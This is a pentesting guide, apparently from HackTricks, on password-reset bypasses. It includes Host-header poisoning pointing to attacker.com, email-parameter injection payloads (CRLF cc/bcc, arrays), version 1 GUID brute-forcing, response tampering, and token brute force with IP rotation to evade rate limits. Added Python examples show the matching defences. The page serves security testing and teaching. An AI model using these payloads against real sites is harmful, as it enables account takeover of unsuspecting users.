
Reset/Forgotten Password Bypass

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

HackenProof is home to all crypto bug bounties.

Get rewarded without delays
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.

Get experience in web3 pentesting
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.

Become the web3 hacker legend
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.

Sign up on HackenProof start earning from your hacks!

{% embed url="https://hackenproof.com/register" %}

The following compilation of techniques was taken from https://anugrahsr.github.io/posts/10-Password-reset-flaws/

Password Reset Token Leak Via Referrer

The HTTP Referer is an optional request header that carries the address of the previous web page from which the currently requested resource was linked. If the reset page keeps the token in its URL, any third-party resource loaded from or followed on that page can receive the token in this header.

Exploitation

  • Request a password reset to your own email address
  • Click on the password reset link
  • Don't change the password
  • Click any third-party website link (e.g. Facebook, Twitter)
  • Intercept the request in the Burp Suite proxy
  • Check whether the Referer header is leaking the password reset token.

Impact

It allows whoever controls that third-party site to change the user's password (CSRF attack), because they now know the user's password reset token.


Password Reset Poisoning

If you find a host header attack and it’s out of scope, try to find the password reset button!

Exploitation

  • Intercept the password reset request in Burp Suite
  • Add or edit the following headers in Burp Suite (try one variant at a time):

```
Host: attacker.com
```

```
Host: target.com
X-Forwarded-Host: attacker.com
```

```
Host: target.com
Host: attacker.com
```

  • Check whether the link to change the password inside the email points to attacker.com

Patch

Use $_SERVER['SERVER_NAME'] rather than $_SERVER['HTTP_HOST']. The vulnerable pattern builds the reset link directly from the Host header:

```php
$resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/reset-password.php?token=12345678-1234-1234-1234-12345678901";
```

Impact

The victim receives the malicious link in their email; when clicked, it leaks the user's password reset link / token to the attacker, leading to full account takeover.


Password Reset By Manipulating Email Parameter

Exploitation

  • Add attacker email as second parameter using &

```
POST /resetPassword
[...]
[email protected]&[email protected]
```

  • Add attacker email as second parameter using %20

```
POST /resetPassword
[...]
[email protected]%20[email protected]
```

  • Add attacker email as second parameter using |

```
POST /resetPassword
[...]
[email protected]|[email protected]
```

  • Add attacker email as second parameter using cc

```
POST /resetPassword
[...]
email="[email protected]%0a%0dcc:[email protected]"
```

  • Add attacker email as second parameter using bcc

```
POST /resetPassword
[...]
email="[email protected]%0a%0dbcc:[email protected]"
```

  • Add attacker email as second parameter using ,

```
POST /resetPassword
[...]
email="[email protected]",email="[email protected]"
```

  • Add attacker email as second parameter in a JSON array

```
POST /resetPassword
[...]
{"email":["[email protected]","[email protected]"]}
```
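As an added example (not code from the page), here is the server-side recipient validation that defeats every variant in the list above: the reset endpoint must extract exactly one well-formed address from the request and refuse anything else, rather than passing the raw parameter to the mailer. The victim/attacker addresses, the field name `email` and the strict address pattern are constructed assumptions.

```python
import json
import re
from urllib.parse import parse_qs

# Deliberately strict "local@domain" shape (constructed for this example, not a
# full RFC 5322 grammar): whitespace, quotes, commas, pipes, colons and control
# characters cannot match, so every separator trick listed above fails.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")


class RecipientError(ValueError):
    """The request does not carry exactly one well-formed recipient address."""


def _single_address(value):
    if not isinstance(value, str):
        raise RecipientError("email must be a single string, not a list or object")
    if EMAIL_RE.fullmatch(value) is None:
        raise RecipientError(f"not a single well-formed address: {value!r}")
    return value.lower()


def recipient_from_form(body):
    """Parse an application/x-www-form-urlencoded body and return the one address."""
    fields = parse_qs(body, keep_blank_values=True)
    values = fields.get("email", [])
    if len(values) != 1:  # rejects email=a&email=b outright
        raise RecipientError(f"expected exactly one email parameter, got {len(values)}")
    return _single_address(values[0])


def recipient_from_json(body):
    """Parse an application/json body and return the one address."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError as exc:
        raise RecipientError("body is not valid JSON") from exc
    if not isinstance(data, dict):
        raise RecipientError("JSON body must be an object")
    return _single_address(data.get("email"))  # rejects {"email": [a, b]} and missing keys


# Constructed payloads mirroring each bullet above (addresses are invented).
REJECTED_FORM_BODIES = [
    "email=victim%40example.com&email=attacker%40example.net",
    "email=victim%40example.com%20attacker%40example.net",
    "email=victim%40example.com|attacker%40example.net",
    "email=victim%40example.com%0a%0dcc:attacker%40example.net",
    "email=victim%40example.com%0a%0dbcc:attacker%40example.net",
    'email="victim%40example.com",email="attacker%40example.net"',
]
REJECTED_JSON_BODIES = [
    '{"email":["victim@example.com","attacker@example.net"]}',
    '{}',
]


def _accepted(parser, body):
    try:
        parser(body)
        return True
    except RecipientError:
        return False


def all_injections_rejected():
    """True when none of the constructed multi-recipient payloads gets through."""
    return (all(not _accepted(recipient_from_form, b) for b in REJECTED_FORM_BODIES)
            and all(not _accepted(recipient_from_json, b) for b in REJECTED_JSON_BODIES))


if __name__ == "__main__":
    print(recipient_from_form("email=victim%40example.com"))
    print("all injection variants rejected:", all_injections_rejected())
```

The second half of the fix is not visible here: the address that passes validation must also be looked up in the user table, and the reset mail must go only to the address stored for that account, never to the value the request supplied.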


Changing Email And Password of any User through API Parameters

Exploitation

  • Log in with the attacker's own account and go to the change password function
  • Start Burp Suite and intercept the request
  • Send the intercepted request to Repeater and modify the Email and Password parameters

```
POST /api/changepass
[...]
{"form": {"email":"[email protected]","password":"12345678"}}
```


No Rate Limiting: Email Bombing

Exploitation

  • Start Burp Suite and intercept the password reset request
  • Send it to Intruder
  • Use a null payload


Find out How Password Reset Token is Generated

Figure out the pattern of the password reset token. Check whether it is:

  • Generated based on a timestamp
  • Generated based on the user ID
  • Generated based on the user's email
  • Generated based on first name and last name
  • Generated based on date of birth
  • Generated using cryptography

Use Burp Sequencer to measure the randomness or predictability of tokens.

Guessable GUID

There are different types of GUIDs:

  • Version 0: Only seen in the nil GUID ("00000000-0000-0000-0000-000000000000").
  • Version 1: The GUID is generated in a predictable manner based on:
    • The current time
    • A randomly generated "clock sequence" which remains constant between GUIDs during the uptime of the generating system
    • A "node ID", which is generated based on the system's MAC address if it is available
  • Version 3: The GUID is generated using an MD5 hash of a provided name and namespace.
  • Version 4: The GUID is randomly generated.
  • Version 5: The GUID is generated using a SHA1 hash of a provided name and namespace.

It's possible to look at a GUID and find out its version; there is a small tool for that: guidtool

```
guidtool -i 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c
UUID version: 1
UUID time: 2021-11-17 17:52:18.141000
UUID timestamp: 138564643381410000
UUID node: 17547390002044
UUID MAC address: 0f:f5:91:f2:a3:7c
UUID clock sequence: 3426
```

If the version used to generate the password reset GUID is version 1, it's possible to brute-force GUIDs:

```
guidtool 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c -t '2021-11-17 18:03:17' -p 10000
a34aca00-47d0-11ec-8d62-0ff591f2a37c
a34af110-47d0-11ec-8d62-0ff591f2a37c
```
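As an added example (not guidtool's code and not from the page), the following Python uses only the standard library to recover the same fields guidtool -i prints for the version 1 UUID above, which is exactly why a version 1 value is unfit as a reset token, and shows the two generators that are fit: an opaque CSPRNG token, or a version 4 UUID where the schema insists on a UUID column. The acceptance rule (version 4 only) and the token length are assumptions of this example.

```python
import secrets
import uuid
from datetime import datetime, timedelta, timezone

# 100-nanosecond ticks between the UUID epoch (1582-10-15) and the Unix epoch.
UUID_EPOCH_OFFSET_TICKS = 0x01B21DD213814000


def describe_uuid(text):
    """Report what a UUID reveals about how it was generated.

    For version 1 the value is just timestamp + clock sequence + node (MAC),
    all of which are read back here without any secret.
    """
    u = uuid.UUID(text)
    info = {"version": u.version}
    if u.version == 1:
        unix_ticks = u.time - UUID_EPOCH_OFFSET_TICKS
        when = datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=unix_ticks // 10)
        info.update({
            "timestamp": u.time,                                  # 100-ns ticks since 1582
            "time": when.strftime("%Y-%m-%d %H:%M:%S.%f"),        # UTC wall clock
            "node": u.node,
            "mac": ":".join(f"{(u.node >> shift) & 0xFF:02x}" for shift in range(40, -1, -8)),
            "clock_seq": u.clock_seq,
        })
    return info


def uuid_token_is_acceptable(text):
    """Accept a UUID-shaped reset token only if it is version 4.

    Version 1 is time + MAC + clock sequence (recoverable above), versions 3
    and 5 are hashes of a name the server may derive from user data, and the
    nil UUID has no entropy at all. Anything that is not a UUID is rejected
    here because this check is only about UUID-shaped tokens.
    """
    try:
        return uuid.UUID(text).version == 4
    except ValueError:
        return False


def new_reset_token():
    """Preferred form: 256 bits from the OS CSPRNG, no structure to analyse."""
    return secrets.token_urlsafe(32)


def new_uuid4_token():
    """Acceptable alternative when the schema requires a UUID column (os.urandom based)."""
    return str(uuid.uuid4())


if __name__ == "__main__":
    for key, value in describe_uuid("1b2d78d0-47cf-11ec-8d62-0ff591f2a37c").items():
        print(f"{key}: {value}")
    print("v1 acceptable:", uuid_token_is_acceptable("1b2d78d0-47cf-11ec-8d62-0ff591f2a37c"))
    print("v4 acceptable:", uuid_token_is_acceptable(new_uuid4_token()))
    print("opaque token:", new_reset_token())
```

Running describe_uuid on the page's sample reproduces guidtool's output line for line (version 1, 2021-11-17 17:52:18.141000, node 17547390002044, MAC 0f:f5:91:f2:a3:7c, clock sequence 3426), which makes the point concrete: the only unknown in a version 1 token is the sub-second part of the timestamp.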


Response manipulation: Replace Bad Response With Good One

Look for a request and response like these:

```
HTTP/1.1 401 Unauthorized
{"message":"unsuccessful","statusCode":403,"errorDescription":"Unsuccessful"}
```

Change the response to:

```
HTTP/1.1 200 OK
{"message":"success","statusCode":200,"errorDescription":"Success"}
```


Using Expired Token

  • Check if the expired token can be reused

Brute Force Password Reset Token

Try to brute-force the reset token using Burp Suite:

```
POST /resetPassword
[...]
[email protected]&code=$BRUTE$
```

  • Use IP Rotator in Burp Suite to bypass IP-based rate limiting.


Try Using Your Token

  • Try using your own password reset token with the victim's account

```
POST /resetPassword
[...]
[email protected]&code=$YOUR_TOKEN$
```


Session Invalidation in Logout/Password Reset

When a user logs out or resets their password, the current session should be invalidated.
Therefore, grab the cookies while the user is logged in, log out, and check whether the cookies are still valid.
Repeat the process, changing the password instead of logging out.

Reset Token expiration Time

Reset tokens must have an expiration time; after it, the token should no longer be valid to change a user's password.
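As an added example (not code from the page), the following Python is an in-memory model of a reset flow that passes the last four checks above: a token is bound to the account it was issued for (so another user's token is refused), it expires, it can be used once, and redeeming it invalidates every existing session of that user, as does logging out. The 15 minute lifetime, the user names and the storage layout are constructed assumptions.

```python
import hashlib
import secrets
from dataclasses import dataclass

RESET_TOKEN_TTL_SECONDS = 15 * 60  # constructed policy value


@dataclass
class ResetRecord:
    user: str
    expires_at: float
    used: bool = False


class ResetFlow:
    """Constructed in-memory model; a real deployment keeps the same rules in its database."""

    def __init__(self):
        self._resets = {}        # sha256(token) -> ResetRecord
        self._sessions = {}      # session id -> user
        self._password_gen = {}  # user -> how many times the password was reset

    @staticmethod
    def _digest(token):
        # Store only a hash so a leaked table cannot be replayed as live tokens.
        return hashlib.sha256(token.encode()).hexdigest()

    # --- sessions -------------------------------------------------------
    def login(self, user):
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = user
        return sid

    def session_user(self, sid):
        return self._sessions.get(sid)

    def logout(self, sid):
        self._sessions.pop(sid, None)  # the cookie value is dead from here on

    def _invalidate_all_sessions(self, user):
        for sid in [s for s, u in self._sessions.items() if u == user]:
            del self._sessions[sid]

    def password_generation(self, user):
        return self._password_gen.get(user, 0)

    # --- reset tokens ---------------------------------------------------
    def issue_reset(self, user, now):
        # A new request supersedes any earlier unused token for the same user.
        self._resets = {d: r for d, r in self._resets.items() if r.user != user}
        token = secrets.token_urlsafe(32)
        self._resets[self._digest(token)] = ResetRecord(user, now + RESET_TOKEN_TTL_SECONDS)
        return token

    def redeem_reset(self, user, token, now):
        """Return True and rotate the password only if every check passes."""
        record = self._resets.get(self._digest(token))
        if record is None:
            return False                      # unknown, superseded or never issued
        if record.user != user:
            return False                      # token belongs to another account
        if record.used or now > record.expires_at:
            return False                      # single use, bounded lifetime
        record.used = True
        self._password_gen[user] = self.password_generation(user) + 1
        self._invalidate_all_sessions(user)   # old cookies stop working
        return True


if __name__ == "__main__":
    flow = ResetFlow()
    sid = flow.login("alice")
    token = flow.issue_reset("alice", now=0.0)
    print("redeem by bob:", flow.redeem_reset("bob", token, now=1.0))
    print("redeem by alice:", flow.redeem_reset("alice", token, now=1.0))
    print("alice session still valid:", flow.session_user(sid) is not None)
    print("token reused:", flow.redeem_reset("alice", token, now=2.0))
```

The time is passed in explicitly so that expiry can be exercised deterministically; in production `now` would come from the clock and the token table lookup would happen in the database, with the same four refusals in the same order.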

Extra Checks
